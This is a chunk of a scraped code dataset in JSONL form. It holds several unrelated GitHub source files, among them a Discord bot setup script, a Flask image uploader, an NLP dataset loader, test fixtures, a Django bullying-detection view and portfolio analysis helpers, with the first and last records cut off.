tmp[\"related_term\"] = info[\"regions\"][0]['sem_ext'][2]['value']\n\n Landmarks[_class] = tmp\n\nwith open('../landmarks_info.json', 'w',\n encoding='utf-8') as make_file:\n json.dump(Landmarks, make_file, indent=\"\\t\", ensure_ascii=False)\n","repo_name":"ITHwang/APOKIA","sub_path":"Image_Recognition_Model/create_json.py","file_name":"create_json.py","file_ext":"py","file_size_in_byte":1849,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8365083481","text":"\"\"\" Vincenzo Passariello - Es1 - Lab04 \"\"\"\r\n\r\ndef tupleMod(t1, t2, n):\r\n lst = list(t1)\r\n lst2 = list(t2)\r\n if(n <= len(t1)):\r\n lst2.reverse()\r\n for i in range(0, len(lst2)):\r\n lst.insert(n, lst2[i])\r\n return(tuple(lst))\r\n else:\r\n for i in range(0, len(lst2)):\r\n lst.insert(n, lst2[i])\r\n return(tuple(lst))\r\n","repo_name":"vinniepassa/PythonLabMate20172018","sub_path":"Lab04/Es1.py","file_name":"Es1.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4253049810","text":"from .models import QuestionSurv\nimport docx\nfrom datetime import datetime\n\ndef add_answer(document, spisok):\n if (len(spisok) > 0) and (spisok[0] != ''):\n for element in spisok:\n document.add_paragraph(element, 'List Bullet 2')\n\ndef sent_to_file(data):\n sys = []\n part = []\n file_name = str(datetime.now()) + '.docx'\n document = docx.Document()\n document.add_heading('ДЕТАЛЬНЫЙ ОПРОСНЫЙ ЛИСТ', 0)\n for key in data.keys():\n query_bd = QuestionSurv.objects.get(id=key)\n if (query_bd.partition.type.id in sys) and (query_bd.partition.id in part):\n p = document.add_paragraph('','List Bullet')\n r = p.add_run(query_bd.question)\n r.bold = True\n add_answer(document, data[key])\n elif query_bd.partition.type.id in sys:\n document.add_paragraph(query_bd.partition.name, 'Intense Quote')\n p = document.add_paragraph('', 'List Bullet')\n r = p.add_run(query_bd.question)\n r.bold = True\n add_answer(document, data[key])\n part.append(query_bd.partition.id)\n else:\n document.add_heading(query_bd.partition.type.name, 1)\n document.add_paragraph(query_bd.partition.name, 'Intense Quote')\n p = document.add_paragraph('','List Bullet')\n r = p.add_run(query_bd.question)\n r.bold = True\n add_answer(document, data[key])\n sys.append(query_bd.partition.type.id)\n part.append(query_bd.partition.id)\n\n document.save('./media/surv/'+ file_name)\n return file_name","repo_name":"bolt41/ButlerCFG","sub_path":"butlersurv/engine.py","file_name":"engine.py","file_ext":"py","file_size_in_byte":1670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"9619979162","text":"import sys\r\nimport subprocess\r\nimport json\r\nimport random as rand\r\n\r\n\r\ndef install_reqs():\r\n interpreter = sys.executable\r\n \r\n if interpreter is None:\r\n print(\"Fatal error: cannot find Python interpreter.\")\r\n sys.exit(1)\r\n \r\n print(\"Updating pip...\")\r\n succ = subprocess.call([interpreter, '-m', 'pip', 'install', '--upgrade', 'pip'])\r\n \r\n if succ == 0:\r\n print(\"\\nPip was successfully updated.\\n\")\r\n else:\r\n print(\"\\nAn error occured while updating pip. This shouldn't be a big problem.\\n\")\r\n \r\n print(\"Downloading requirements\")\r\n succ = subprocess.call([interpreter, '-m', 'pip', 'install', '--upgrade', '-r', 'requirements.txt'])\r\n \r\n if succ == 0:\r\n print(\"\\nRequirements successfully installed.\\n\")\r\n else:\r\n print(\"An error occured while installing the requirements.\"\r\n \"Double check that you installed everything correctly as per the instructions on the github and try again.\")\r\n sys.exit(1)\r\n\r\n\r\ndef create_settings():\r\n print(\"By default, the trigger word is 'Hey Tbot, ' (space included)\\n\"\r\n \"So, for example, you might say 'Hey Tbot, tell me a joke!'\\n\"\r\n \"You can change this to be anything, such as '!Tbot ' or 'Yo Tbot! ' or simply '! '\\n\"\r\n \"Leave it blank to use the default. You can make it case sensitive/insensitive later, \"\r\n \"and change the triggerword entirely as a bot command after setup.\\n\")\r\n \r\n confirm = 'N'\r\n while confirm in ['n', 'N']:\r\n wakeword = input(\"Please input a wakeword: \")\r\n if wakeword.strip() == '':\r\n wakeword = 'Hey Tbot, '\r\n \r\n case_sensitive = None\r\n while case_sensitive not in ['y', 'n', 'yes', 'no']:\r\n case_sensitive = input('Do you want this to be casesensitive? (Y/N): ').lower()\r\n \r\n if case_sensitive in ['y', 'yes']:\r\n case_sensitive = True\r\n else:\r\n case_sensitive = False\r\n \r\n print(f\"Wakeword: '{wakeword}'\\nCase Sensitive: {case_sensitive}\")\r\n print(f\"Do these commands look like what you want/are possible: \\n\")\r\n if case_sensitive:\r\n print(f\"\\t{wakeword}tell me a joke!\")\r\n print(f\"\\t{wakeword}what rhymes with lizard?\")\r\n print(\"\\nThe following commands would not be valid: \")\r\n \r\n if wakeword.lower() != wakeword:\r\n print(f\"\\t{wakeword.lower()}tell me a joke!\")\r\n if wakeword.title() != wakeword:\r\n print(f\"\\t{wakeword.title()}what rhymes with lizard?\")\r\n if wakeword.upper() != wakeword:\r\n print(f\"\\t{wakeword.upper()}what's a synonym for cool?\")\r\n else:\r\n print(f\"\\t{wakeword}what's up?\")\r\n print(f\"\\t{wakeword.lower()}tell me a joke!\")\r\n print(f\"\\t{''.join(rand.choice([char.upper(), char]) for char in wakeword.lower())}what rhymes with lizard?\")\r\n print(f\"\\t{wakeword.upper()}what's a synonym for cool?\")\r\n \r\n cont = None\r\n while cont not in ['y', 'n', 'yes', 'no']:\r\n cont = input(\"\\nLook good? (Y/N): \").lower()\r\n confirm = cont\r\n \r\n print(\"TBot has several auto-task functions, which will automatically send messages in various intervals.\\n\"\r\n \"For example, TBot has an emote report that will be sent every week and displays the popularity of \"\r\n \"various emotes.\\nPlease input a channel ID to designate as the 'default channel' for TBot to post in \"\r\n \"(either for auto-tasks or for large posts.\\n Input nothing and TBot will use the default channel on the \"\r\n \"server. To grab the channel ID, right click a channel in the discord client and click 'copy id.'\")\r\n default_channel = \".\"\r\n while not default_channel.isdigit():\r\n default_channel = input(\"Please input a valid (numerical) channel id: \").strip()\r\n if default_channel == '':\r\n break\r\n\r\n token = None\r\n while token is None and token != '':\r\n token = input(\"\\nAt the beginning of the setup instructions on github, you wrote down a token.\\n\"\r\n \"Please input that here: \")\r\n \r\n print(\"\\nSaving all settings to cogs/util/data/settings.txt\")\r\n \r\n with open('cogs/util/data/settings.txt', 'w') as f:\r\n settings = {'Wakeword': wakeword,\r\n 'CaseSensitive': case_sensitive,\r\n 'DefaultChannel': default_channel,\r\n 'Token': token}\r\n f.write(json.dumps(settings))\r\n\r\n\r\ndef fix_async():\r\n print('Fixing async issues in required libraries...\\n')\r\n from inspect import getsourcefile\r\n import chardet\r\n\r\n path = getsourcefile(chardet)\r\n path = path[:path.rfind('\\\\chardet\\\\')] + '\\\\discord\\\\compat.py'\r\n print('Fixing discord/compat')\r\n with open(path, 'r') as f:\r\n lines = f.readlines()\r\n lines[31] = \" create_task = getattr(asyncio, 'async')\\n\"\r\n with open(path, 'w') as f:\r\n f.write(''.join(line for line in lines))\r\n\r\n path = path[:path.rfind('\\\\discord\\\\')] + '\\\\websockets\\\\compatibility.py'\r\n print('Fixing websockets/compatibility')\r\n with open(path, 'r') as f:\r\n lines = f.readlines()\r\n lines[8] = \" asyncio_ensure_future = getattr(asyncio, 'async')\\n\"\r\n with open(path, 'w') as f:\r\n f.write(''.join(line for line in lines))\r\n\r\n path = path[:path.rfind('\\\\websockets\\\\')] + '\\\\aiohttp\\\\helpers.py'\r\n print('Fixing aiohttp/helpers')\r\n with open(path, 'r') as f:\r\n lines = f.readlines()\r\n lines[24] = \" ensure_future = getattr(asyncio, 'async')\\n\"\r\n with open(path, 'w') as f:\r\n f.write(''.join(line for line in lines))\r\n print('\\nFininished fixing compatibility.\\n')\r\n\r\n\r\ndef main():\r\n interpreter = sys.executable\r\n \r\n if interpreter is None:\r\n print(\"Fatal Error: Cannot find Python interpreter\")\r\n sys.exit(1)\r\n \r\n while True:\r\n try:\r\n succ = subprocess.call([interpreter, 'tbot.py'])\r\n\r\n except KeyboardInterrupt:\r\n succ = 0\r\n\r\n finally:\r\n break\r\n\r\n print(f\"TBot has exited with exit code: {succ}.\")\r\n \r\n\r\nif __name__ == '__main__':\r\n print('======TBot Setup======\\n' + '='*22, end='\\n\\n\\n')\r\n print('Note, running this script will reset any current TBot settings. \\n')\r\n cont = None\r\n while cont not in ['y', 'n', 'yes', 'no']:\r\n cont = input('Do you want to continue? (Y/N): ').lower()\r\n\r\n if cont in ['n', 'no']:\r\n sys.exit(0)\r\n\r\n if sys.version_info >= (3, 7):\r\n print(f\"Your current Python version ({str(sys.version_info.major)}.{str(sys.version_info.minor)}) \"\r\n f\"is not fully compatible. TBot still uses the old version of discord.py which uses 3.6.\\n\"\r\n \"This is okay, but you will have to make a few modifications to some of the required libraries \"\r\n \"for TBot to run. \\nThis script can do this automatically, or you may create a virtual \"\r\n \"environment with an older Python version.\", end='\\n\\n')\r\n edit = None\r\n while edit not in ['y', 'n', 'yes', 'no']:\r\n edit = input(\"Would you like to automatically edit the required libraries? (Y/N): \").lower()\r\n\r\n if edit in ['y', 'yes']:\r\n edit = True\r\n else:\r\n edit = False\r\n\r\n print('='*50 + '\\n' + '='*50)\r\n\r\n print(\"Installing requirements...\")\r\n install_reqs()\r\n input(\"Press any key to continue.\")\r\n print('='*50 + '\\n' + '='*50 + '\\n')\r\n\r\n if edit:\r\n fix_async()\r\n input(\"Press any key to continue.\")\r\n print('=' * 50 + '\\n' + '=' * 50 + '\\n')\r\n\r\n create_settings()\r\n input(\"Press any key to continue.\")\r\n print('='*50 + '\\n' + '='*50 + '\\n')\r\n \r\n cont = None\r\n while cont not in ['y', 'n', 'yes', 'no']:\r\n cont = input(\"TBot setup has been complete. Would you like to launch the bot? (Y/N): \").lower()\r\n \r\n if cont in ['n', 'no']:\r\n print(\"You can launch TBot by typing into the command prompt 'python tbot.py'\")\r\n sys.exit(0)\r\n \r\n else:\r\n print(\"Launching TBot!\")\r\n main()\r\n \r\n \r\n\r\n","repo_name":"trevor-pope/TBot","sub_path":"initial_setup.py","file_name":"initial_setup.py","file_ext":"py","file_size_in_byte":8260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"491235450","text":"import requests\nfrom bs4 import BeautifulSoup\nimport re\nfrom collections import Counter\n\n# code Python qui utilise la méthode d'indexation pour rechercher\n# Les mots les plus fréquemment répétés\n# dans une page web sans compter les balises HTML\n\n# Fonction pour extraire le texte de la page web en ignorant les balises HTML\ndef get_text(url):\n page = requests.get(url)\n soup = BeautifulSoup(page.content, 'html.parser')\n for script in soup([\"script\", \"style\"]):\n script.decompose()\n text = soup.get_text()\n text = re.sub(r'\\s+', ' ', text)\n return text\n\n# Fonction pour compter les mots les plus fréquents\ndef count_words(text, n):\n words = re.findall('\\w+', text.lower())\n return Counter(words).most_common(n)\n\n# URL de la page web à analyser\nurl = 'https://www.example.com'\n\n# Récupération du texte de la page web\ntext = get_text(url)\n\n# Comptage des mots les plus fréquents (10 dans cet exemple)\nn = 10\ntop_words = count_words(text, n)\n\n# Affichage des résultats\nprint('Les', n, 'mots les plus fréquents sur la page', url, 'sont:')\nfor word, count in top_words:\n print(word, ':', count)\n","repo_name":"LucienTriail/Search3","sub_path":"searchTryData.py","file_name":"searchTryData.py","file_ext":"py","file_size_in_byte":1136,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"72631484627","text":"from werkzeug.utils import secure_filename\nfrom PIL import Image\nimport os\nimport hashlib\n\n\nALLOWED_EXTENSIONS = {\"txt\", \"pdf\", \"png\", \"jpg\", \"jpeg\", \"gif\"}\nUPLOAD_FOLDER = os.getcwd() + \"/app/api/static/img/siswa/foto/\"\n# foto_folder = os.getcwd() + '/app/static/img/siswa/photos/'\n\n# MAX_FILE_SIZE = 2000\n\n\ndef allowed_extension(filename):\n return \".\" in filename and filename.rsplit(\".\", 1)[1].lower() in ALLOWED_EXTENSIONS\n\n\ndef get_secure_filename(filename):\n return str(secure_filename(filename))\n\n\ndef uploads(f, nama_user, kelas):\n if f and allowed_extension(f.filename):\n fileOrigin = f.filename.rsplit(\".\", 1)\n fileExt = fileOrigin[1].lower()\n if fileExt == \"jpeg\" or fileExt == \"jpg\" or fileExt == \"png\":\n encFile = hashlib.md5(\n get_secure_filename(f.filename).encode(\"utf-8\")\n ).hexdigest()\n pathFile = (\n UPLOAD_FOLDER + kelas + \"_\" + nama_user + \"_\" + encFile + \".\" + fileExt\n )\n f.save(pathFile)\n return {\n \"status\": \"ok\",\n \"path_file\": pathFile,\n \"photo_name\": kelas + \"_\" + nama_user + \"_\" + encFile + \".\" + fileExt,\n }\n elif fileExt == \"pdf\":\n encFile = hashlib.md5(\n get_secure_filename(f.filename).encode(\"utf-8\")\n ).hexdigest()\n pathFile = (\n UPLOAD_FOLDER + \"/doc/\" + nama_user + \"_\" + encFile + \".\" + fileExt\n )\n f.save(pathFile)\n return {\n \"status\": \"ok\",\n \"path_file\": pathFile,\n \"berkas_name\": nama_user + \"_\" + encFile + \".\" + fileExt,\n }\n else:\n return {\"status\": \"error\"}\n\n\ndef upload_resize_photo(f, nama_user, kelas):\n if f and allowed_extension(f.filename):\n fileOrign = f.filename.rsplit(\".\", 1)\n fileExt = fileOrign[1].lower()\n if fileExt == \"jpeg\" or fileExt == \"jpg\" or fileExt == \"png\":\n encryptFile = hashlib.md5(\n get_secure_filename(f.filename).encode(\"utf-8\")\n ).hexdigest()\n filename = f\"{kelas}_{nama_user}_{encryptFile}.{fileExt}\"\n path_file = UPLOAD_FOLDER + filename\n img = Image.open(f)\n # print(f\"IMAGE SIZE == {img.size}\")\n if img.size[0] <= 1000 & img.size[1] <= 1000:\n img.save(\n os.path.join(UPLOAD_FOLDER, filename), optimize=True, quality=95\n )\n\n response = dict(status=\"Ok\", filename=filename, path=path_file)\n return response\n else:\n width = int(img.size[0] / 10) * 2\n height = int(img.size[1] / 10) * 2\n\n re_image = img.resize((width, height), Image.ADAPTIVE)\n re_image.save(\n os.path.join(UPLOAD_FOLDER, filename), optimize=True, quality=95\n )\n response = dict(status=\"Ok\", filename=filename, path=path_file)\n return response\n","repo_name":"ariefendi992/sistem-monitoring","sub_path":"app/lib/uploader.py","file_name":"uploader.py","file_ext":"py","file_size_in_byte":3074,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"25922377092","text":"from typing import Dict, TypeVar\n\nimport torch\nfrom datasets import load_dataset\nfrom transformers import BertTokenizer\n\nfrom utils.data import DictTensorDataset\n\nfrom .base import DatasetForRE\n\nT = TypeVar(\"T\")\n\n\nclass SemEvalForRE(DatasetForRE):\n HUGGINGFACE_DATASET_NAME = \"sem_eval_2010_task_8\"\n BERT_TOKENIZER_NAME = \"bert-base-uncased\"\n MAX_SEQ_LEN = 128\n CLASSES_NUM = 19\n IGNORED_CLASS_INDEX = 0\n\n def __init__(self, hf_data):\n super(SemEvalForRE, self).__init__()\n self.tokenizer: BertTokenizer = BertTokenizer.from_pretrained(self.BERT_TOKENIZER_NAME, do_lower_case=True)\n self._data = self._transform_dataset(hf_data)\n\n @classmethod\n def get_dataset_name(cls):\n return cls.HUGGINGFACE_DATASET_NAME\n\n @property\n def inner_data(self):\n return self._data\n\n @classmethod\n def load(cls: T, dataset_name=None, **kwargs) -> Dict[str, T]:\n assert dataset_name is None or dataset_name == cls.HUGGINGFACE_DATASET_NAME\n ds_dict = load_dataset(cls.HUGGINGFACE_DATASET_NAME)\n return {\n \"train\": cls(ds_dict[\"train\"]),\n \"validate\": cls(ds_dict[\"test\"]),\n }\n\n def _transform_dataset(self, hf_data) -> DictTensorDataset:\n \"\"\"\n Example of each row of hf_data:\n {'sentence': 'The system as described above has its greatest application in an arrayed configuration of antenna elements.', 'relation': 3}\n \"\"\"\n input_ids = []\n attention_masks = []\n labels = []\n e1_pos = []\n e2_pos = []\n actual_lens = []\n for item in hf_data:\n encoded_dict = self.tokenizer(\n item[\"sentence\"],\n add_special_tokens=False,\n padding=\"max_length\",\n truncation=False,\n max_length=self.MAX_SEQ_LEN,\n return_attention_mask=True,\n return_tensors=\"pt\",\n )\n try:\n # find position of and \n ids = encoded_dict[\"input_ids\"]\n mask = encoded_dict[\"attention_mask\"]\n # Find e1(id:2487) and e2(id:2475) position\n pos1 = (ids == 2487).nonzero()[0][1].item()\n pos2 = (ids == 2475).nonzero()[0][1].item()\n if pos1 >= self.MAX_SEQ_LEN:\n pos1 = -1\n if pos2 >= self.MAX_SEQ_LEN:\n pos2 = -1\n # truncate manually\n if ids.shape[1] > self.MAX_SEQ_LEN:\n ids = torch.narrow_copy(ids, 1, 0, self.MAX_SEQ_LEN)\n ids[0, -1] = self.tokenizer.sep_token_id\n mask = torch.narrow_copy(mask, 1, 0, self.MAX_SEQ_LEN)\n e1_pos.append(pos1)\n e2_pos.append(pos2)\n # Add the encoded sentence to the list.\n input_ids.append(ids)\n # And its attention mask (simply differentiates padding from non-padding).\n attention_masks.append(mask)\n labels.append(item[\"relation\"])\n actual_len = torch.max(torch.arange(1, self.MAX_SEQ_LEN + 1, dtype=torch.long) * mask).item()\n actual_lens.append(actual_len)\n except:\n pass\n\n # Convert the lists into tensors.\n input_ids = torch.cat(input_ids, dim=0)\n attention_masks = torch.cat(attention_masks, dim=0)\n labels = torch.tensor(labels, dtype=torch.long)\n e1_pos = torch.tensor(e1_pos, dtype=torch.long)\n e2_pos = torch.tensor(e2_pos, dtype=torch.long)\n actual_lens = torch.tensor(actual_lens, dtype=torch.long)\n\n # Combine the training inputs into a TensorDataset.\n return DictTensorDataset(\n {\n \"input_ids\": input_ids,\n \"attention_masks\": attention_masks,\n \"labels\": labels,\n \"e1_pos\": e1_pos,\n \"e2_pos\": e2_pos,\n \"actual_lens\": actual_lens,\n }\n )\n","repo_name":"leonardodalinky/GNN_And_Tree","sub_path":"src/data/re/semeval.py","file_name":"semeval.py","file_ext":"py","file_size_in_byte":4069,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"3740464996","text":"import gc\nfrom base64 import b64encode\nfrom datetime import datetime\nfrom typing import Any, Callable, Generator, Optional\n\nimport attr\nfrom allmydata.storage.server import StorageServer\nfrom attrs import define, field\nfrom fixtures import Fixture, TempDir\nfrom testtools import TestCase\nfrom treq.client import HTTPClient\nfrom twisted.internet.defer import Deferred, inlineCallbacks\nfrom twisted.internet.interfaces import IReactorTime\nfrom twisted.internet.task import Clock, deferLater\nfrom twisted.python.filepath import FilePath\nfrom twisted.web.client import Agent, HTTPConnectionPool\n\nfrom .._plugin import open_store\nfrom ..config import CONFIG_DB_NAME, EmptyConfig, TahoeConfig\nfrom ..controller import DummyRedeemer, IRedeemer, PaymentController\nfrom ..model import VoucherStore, memory_connect\nfrom ..replicate import with_replication\n\n\n@attr.s(auto_attribs=True)\nclass AnonymousStorageServer(Fixture):\n \"\"\"\n Supply an instance of allmydata.storage.server.StorageServer which\n implements anonymous access to Tahoe-LAFS storage server functionality.\n\n :ivar tempdir: The path to the server's storage on the filesystem.\n\n :ivar storage_server: The protocol-agnostic storage server backend.\n\n :ivar clock: The ``IReactorTime`` provider to supply to ``StorageServer``\n for its time-checking needs.\n \"\"\"\n\n clock: Clock = attr.ib()\n\n tempdir: FilePath = attr.ib(default=None)\n storage_server: StorageServer = attr.ib(default=None)\n\n def _setUp(self) -> None:\n self.tempdir = FilePath(self.useFixture(TempDir()).join(\"storage\"))\n self.storage_server = StorageServer(\n self.tempdir.path,\n b\"x\" * 20,\n clock=self.clock,\n )\n\n\ndef _get_empty_config(rootpath: str, portnumfile: str) -> TahoeConfig:\n \"\"\"\n Construct an empty Tahoe configuration object.\n\n :param rootpath: The path of the node directory the configuration will\n use.\n \"\"\"\n return EmptyConfig(FilePath(rootpath))\n\n\n@define\nclass TemporaryVoucherStore(Fixture):\n \"\"\"\n Create a ``VoucherStore`` in a temporary directory associated with the\n given test case.\n\n :ivar get_config: A function like the one built by ``tahoe_configs``.\n :ivar get_now: A no-argument callable that returns a datetime giving a\n time to consider as \"now\".\n\n :ivar store: A newly created temporary store.\n \"\"\"\n\n get_now: Callable[[], datetime]\n get_config: Callable[[str, str], TahoeConfig] = _get_empty_config\n _public_key: str = b64encode(b\"A\" * 32).decode(\"utf-8\")\n redeemer: IRedeemer = field(init=False)\n store: Optional[VoucherStore] = None\n\n @redeemer.default\n def _redeemer_default(self) -> DummyRedeemer:\n return DummyRedeemer(self._public_key)\n\n def _setUp(self) -> None:\n self.tempdir = self.useFixture(TempDir())\n self.config = self.get_config(self.tempdir.join(\"node\"), \"tub.port\")\n db_path = FilePath(self.config.get_private_path(CONFIG_DB_NAME)).asTextMode()\n self.store = open_store(\n self.get_now,\n with_replication(memory_connect(db_path.path), False),\n self.config,\n )\n self.addCleanup(self._cleanUp)\n\n def _cleanUp(self) -> None:\n \"\"\"\n Drop the reference to the ``VoucherStore`` so the underlying SQLite3\n connection can close.\n \"\"\"\n self.store = None\n\n async def redeem(self, voucher: bytes, num_passes: int) -> None:\n \"\"\"\n Redeem a voucher for some passes.\n\n :return: A ``Deferred`` that fires with the redemption result.\n \"\"\"\n if self.store is None:\n raise ValueError(\"Must be set up before redeem()\")\n return await PaymentController(\n Clock(),\n self.store,\n self.redeemer,\n # Have to pass it here or to redeem, doesn't matter which.\n default_token_count=num_passes,\n # No value in splitting it into smaller groups in this case.\n # Doing so only complicates the test by imposing a different\n # minimum token count requirement (can't have fewer tokens\n # than groups).\n num_redemption_groups=1,\n allowed_public_keys={self._public_key},\n ).redeem(\n voucher,\n )\n\n\n@define\nclass Treq(Fixture):\n \"\"\"\n Offer a facility for creating an ``HTTPClient`` which does real I/O using\n a Twisted reactor and is automatically cleaned up.\n \"\"\"\n\n reactor: IReactorTime\n\n # We require a TestCase that supports asynchronous cleanups because\n # Fixtures can't handle them natively.\n case: TestCase\n\n pool: HTTPConnectionPool = field()\n\n @pool.default\n def _pool(self) -> HTTPConnectionPool:\n return HTTPConnectionPool(self.reactor)\n\n def _setUp(self) -> None:\n # Make sure connections from the connection pool are cleaned up at the\n # end of the test.\n self.case.addCleanup(self._cleanup)\n\n def client(self) -> HTTPClient:\n \"\"\"\n Get a new client object.\n \"\"\"\n return HTTPClient(Agent(self.reactor, self.pool))\n\n @inlineCallbacks\n def _cleanup(self) -> Generator[Deferred[Any], Any, None]:\n \"\"\"\n Clean up reactor event-sources allocated by ``HTTPConnectionPool``.\n \"\"\"\n # Close any connections that are idling in the connection pool.\n yield self.pool.closeCachedConnections()\n\n # There may be connections which were *just* finished with. Their\n # `loseConnection` has been called but the connection hasn't actually been\n # lost yet. If their buffers are actually empty then they will close\n # after the reactor gets another look at them. Unfortunately it is\n # unspecified how long after `loseConnection` the connection will actually\n # be lost (the protocol is told via its connectionLost method but the\n # connection pool does not expose that information to us). Empirically, a\n # couple of reactor iterations (or whatever the equivalent is on this\n # reactor) seems to be enough. If it's not, sorry.\n #\n # See https://github.com/twisted/twisted/issues/8998\n yield deferLater(self.reactor, 0, lambda: None)\n yield deferLater(self.reactor, 0, lambda: None)\n\n\nclass DetectLeakedDescriptors(Fixture):\n \"\"\"\n Check for file descriptors that are open at clean up time that were not\n open at set up time and cause the test to fail if any are found.\n \"\"\"\n\n blacklist_filenames = {\n \"privatestorageio-zkapauthz-v1.sqlite3\",\n \"privatestorageio-zkapauthz-v1.sqlite3 (deleted)\",\n }\n\n def _setUp(self) -> None:\n fdpath = FilePath(\"/proc/self/fd\")\n if fdpath.isdir():\n # If it exists, we can inspect it to learn about open file\n # descriptors. If it doesn't, it's a bit harder and we don't\n # bother for now.\n self._before = fdpath.children()\n self.addCleanup(self._cleanup)\n\n def _cleanup(self) -> None:\n def get_leaked() -> set[str]:\n after = FilePath(\"/proc/self/fd\").children()\n return {\n e.realpath()\n for e in set(after) - set(self._before)\n if e.realpath().basename() in self.blacklist_filenames\n }\n\n leaked = get_leaked()\n if leaked:\n # VoucherStore hangs off _Client which participates in a set of\n # impressively complex cyclic references. The reference counting\n # collector will not clean it up so we will *always* see open file\n # descriptors if we don't trigger the cycle collector.\n #\n # Garbage collection is expensive though and a lot of the test\n # suite doesn't make any VoucherStores or _Clients. So only\n # trigger this if we have reason to believe something might have\n # leaked.\n gc.collect()\n\n leaked = get_leaked()\n if leaked:\n raise ValueError(leaked)\n","repo_name":"PrivateStorageio/ZKAPAuthorizer","sub_path":"src/_zkapauthorizer/tests/fixtures.py","file_name":"fixtures.py","file_ext":"py","file_size_in_byte":8078,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"48"} +{"seq_id":"4203623749","text":"from django.shortcuts import render\nfrom .apps import WebsiteConfig\nfrom tensorflow.keras.preprocessing import sequence\nfrom twitter_extractor import twitter_main\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy as np\nimport os\n\n# Create your views here.\n\ndef login(request):\n return render(request, 'login.html', {})\n\ndef home(request):\n return render(request, 'home.html', {})\n\ndef dashboard(request):\n tweets = []\n bully_array = []\n tweets_df = twitter_main.run()\n # tweets_df = df.tail(20)\n for i in range(tweets_df.shape[0]):\n bully_array.append(prediction(tweets_df.loc[i].tweet))\n tweets.append((tweets_df.loc[i].username,tweets_df.loc[i].tweet,tweets_df.loc[i].date, bully_array[-1]))\n tweets_df['bully'] = bully_array\n pie = pie_val(tweets_df)\n\n return render(request, 'dashboard.html', {'tweets':tweets,'pie_bull':round(pie[0]*100/(pie[0]+pie[1]),2),'pie_nbull':round(pie[1]*100/(pie[0]+pie[1]),2)})\n\ndef prediction(sentence):\n test_sequences = WebsiteConfig.tokenizer.texts_to_sequences([sentence])\n test_sequences_matrix = sequence.pad_sequences(test_sequences, maxlen=1000)\n prediction = WebsiteConfig.model.predict(test_sequences_matrix, batch_size=None, verbose=0, steps=None)\n # response = {'Bully': str(prediction[0][0])}\n # print(response)\n # return str(prediction[0][0])\n if prediction[0][0]>0.5:\n return 'Bully'\n else:\n return 'Not Bully'\n\ndef pie_val(df):\n data = [len(df[df['bully'] == 'Bully']),len(df[df['bully'] == 'Not Bully'])]\n return data","repo_name":"TakshSoni123/Cyber-Bully-Detection-System","sub_path":"website/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1571,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"16585214992","text":"import pandas as pd\nimport pandas_market_calendars as mcal\nimport yfinance as yf\nfrom datetime import datetime\nimport sys\nimport pathlib\npath = str(pathlib.Path(__file__).parent.absolute())\n\n\nsys.path.insert(1, path+\"/../bonds\")\nimport funciones.download_functions as df\n\nsys.path.insert(1, path+\"/../database\")\nfrom db_connection import db\nimport load_info as li\nimport store_info as sidb\n\n\n\n\ndef get_historical_prices(movements):\n movs = movements.copy(deep=True)\n # Obtengo tickers de equities incluyendo cedears\n stocks = movs.loc[(movs.GRUPO == \"stock\") | (movs.GRUPO == \"cedear\")]\n tickers_stocks = list(set(stocks.ACTIVO.to_list()))\n\n bonos = movs.loc[(movs.GRUPO == \"bono\")]\n tickers_bonos = list(set(bonos.ACTIVO.to_list()))\n\n force_alt = True\n collection = db.test_collection\n data, fallas_t = li.load_function(tickers_stocks+[\"GGAL\", \"GGAL.BA\"], collection, li.load_price_info,\n li.load_connectionless_info_prices_propio, force_alt=force_alt, cant_t=10,\n ruedas_fallas=None)\n if not force_alt: li.append_last_value(data_prices)\n tickers_stocks = [ticker for ticker in tickers_stocks if ticker not in fallas_t]\n\n bonds_p, fallas_b = df.get_hist_bonos(tickers=tickers_bonos + [\"GD30\", \"GD30D\"], use_iol=False)\n tickers_bonos = [ticker for ticker in tickers_bonos if ticker not in fallas_b]\n\n data.update(bonds_p)\n tickers = tickers_stocks + tickers_bonos\n fallas = fallas_t + fallas_b\n\n return data, tickers, fallas\n\n\n\n\n\n\ndef get_cedears_conversion():\n conversiones = pd.read_excel(\"cedears & adrs conversion.xlsx\", index_col=0)\n\n for ticker in conversiones.index:\n num, den = conversiones.loc[ticker, \"RATIO\"].split(\":\")\n conversiones.loc[ticker, \"RATIO\"] = int(num) / int(den)\n\n return conversiones\n\n\n\n\ndef get_market_dates(start_date, end_date):\n # Create a calendar\n nyse = mcal.get_calendar('NYSE')\n early = nyse.schedule(start_date=start_date, end_date=end_date)\n\n market_dates = list(mcal.date_range(early, frequency='1D'))\n market_dates = [x.replace(hour=0, minute=0, second=0, tzinfo=None) for x in market_dates]\n\n return market_dates\n\n\n\n\n\ndef group_stocks(movements):\n groups = {}\n for i in range(len(movements)):\n group, asset = movements.iloc[i][[\"GRUPO\", \"ACTIVO\"]]\n if group not in groups: groups[group] = []\n if asset not in groups[group]: groups[group].append(asset)\n\n return groups\n\n\n\n\n\ndef get_quantities_df(movements, tickers, dates):\n cantidades = pd.DataFrame(index=dates, columns=tickers)\n\n cantidades.loc[:, :] = 0\n\n # cantidades[\"CASH\"] = cantidades[\"CASH\"].ffill()\n for i in range(len(movements)):\n datos = movements.iloc[i]\n fecha, operacion, ticker, cantidad, precio, importe = datos[\n [\"FECHA\", \"OPERACION\", \"ACTIVO\", \"CANTIDAD\", \"PRECIO\", \"IMPORTE\"]]\n\n if operacion == \"compra\":\n cantidades.loc[cantidades.index >= fecha, ticker] += cantidad\n cantidades.loc[cantidades.index >= fecha, \"ARS\"] -= importe\n elif operacion == \"venta\":\n cantidades.loc[cantidades.index >= fecha, ticker] -= cantidad\n cantidades.loc[cantidades.index >= fecha, \"ARS\"] += 